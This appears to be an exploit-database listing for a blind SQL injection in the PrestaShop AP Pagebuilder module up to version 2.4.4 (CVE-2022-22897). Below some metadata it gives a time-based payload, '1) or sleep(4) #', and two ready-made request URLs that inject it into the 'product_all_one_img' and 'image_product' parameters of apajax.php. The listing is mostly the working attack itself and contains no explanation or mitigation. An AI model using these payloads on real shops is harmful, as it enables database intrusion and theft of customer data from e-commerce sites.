Lucene search
Mohamed Ali Hammami1337DAY-ID-37924HistoryAug 25, 2022 - 12:00 a.m.
PrestaShop Ap Pagebuilder 2.4.4 SQL Injection Vulnerability
2022-08-2500:00:00
Mohamed Ali Hammami
0day.today
281
prestashop
ap pagebuilder
sql injection
vulnerability
apollotheme
0.085 Low
EPSS
Percentile
94.5%
# Exploit Title: AP PAGEBUILDER Prestashop module <= 2.4.4 'product_all_one_img' , 'image_product' Blind SQL Injection
# Exploit Author: Mohamed Ali Hammami
# Vendor Homepage: https://apollotheme.com/
#Software Link : https://apollotheme.com/products/ap-pagebuilder-prestashop-module
# Version: 2.4.4
# Tested on: Windows 10
#CVE: CVE-2022-22897
Parameters: product_all_one_img,image_product
Payload: 1) or sleep(4) #
Exploit:
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1)+or+sleep(4)%23&image_product=0&wishlist_compare=1
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1&image_product=1)+or+sleep(4)%23&wishlist_compare=1
Related
prion
prion
Sql injection
2022-08-29 06:15:00
cve
cve
CVE-2022-22897
2022-08-29 06:15:08
packetstorm
packetstorm
PrestaShop Ap Pagebuilder 2.4.4 SQL Injection
2022-08-25 00:00:00
nuclei
nuclei
PrestaShop AP Pagebuilder <= 2.4.4 - SQL Injection
2023-07-13 16:54:13
cvelist
cvelist
CVE-2022-22897
2022-08-29 00:00:00
nvd
nvd
CVE-2022-22897
2022-08-29 06:15:08